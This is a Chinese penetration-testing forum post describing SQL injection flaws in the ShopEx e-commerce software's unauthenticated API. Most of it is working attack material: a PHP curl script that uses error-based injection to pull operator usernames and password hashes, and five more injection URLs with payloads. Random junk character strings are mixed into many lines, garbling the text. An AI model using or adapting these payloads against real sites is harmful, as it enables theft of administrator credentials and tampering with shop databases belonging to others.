中国网络渗透测试联盟

标题: shopEx最新版的API注入漏洞分析附利用exp [打印本页]

作者: admin    时间: 2013-7-27 18:34
标题: shopEx最新版的API注入漏洞分析附利用exp
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php: a0 E3 w* Z: n) j; l3 `7 Y
core\api\payment\1.0\api_b2b_2_0_payment_cfg.php
( Q6 I+ ~# W3 U4 F( I. f' u9 K, ~6 Z* D; l  |; ]
第44行 $data['columns'] 未做过滤导致注入; |9 z7 x- _- ]0 w3 v

! f* C4 i* i' A) ?- H- w<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.
0 o# a( r/ w; ^' W1 G; i& {- w0 ~- c9 f4 h
注射1:' @) b! a8 _3 C: }; ]3 Z

7 K2 h. D+ F1 j, Nhttp://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
+ _3 i, w6 H& g/ L+ Q1 m! z% n$ {" }9 s: @; {- h7 F1 Z3 \( w7 b
注射2:) i$ o  }7 r$ @: q
http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}. |. F$ w8 Q4 }7 L/ a7 ]  n
1 d- t, Z+ j$ W" l4 U
注射3:
  J- z1 L' n5 s) l3 i2 d  http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx7 s  W, D  A$ V* [3 T
注射4:/ r( J& K6 s% [( i

! Z# [2 Y: ^- g& l( [http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=15 e. v) o7 I6 |/ W3 g! n& T8 X
# d' W  f# x2 _% @9 [: k
3 `( J& R+ H6 K& ?1 x
注射5:
0 n) V. F1 u4 j  http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx; s7 q/ R  I* d& _# {
. N5 h3 k8 l: p. ^% z

5 |' ^/ g, _9 G( m' `6 K
6 _3 Y# s  N" ?& K9 L6 q' x+ w) J/ t9 S8 g1 ^& Y% x( I
/ @8 |9 O8 L% h) p( J

. {5 |6 g, I. z/ {9 q




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2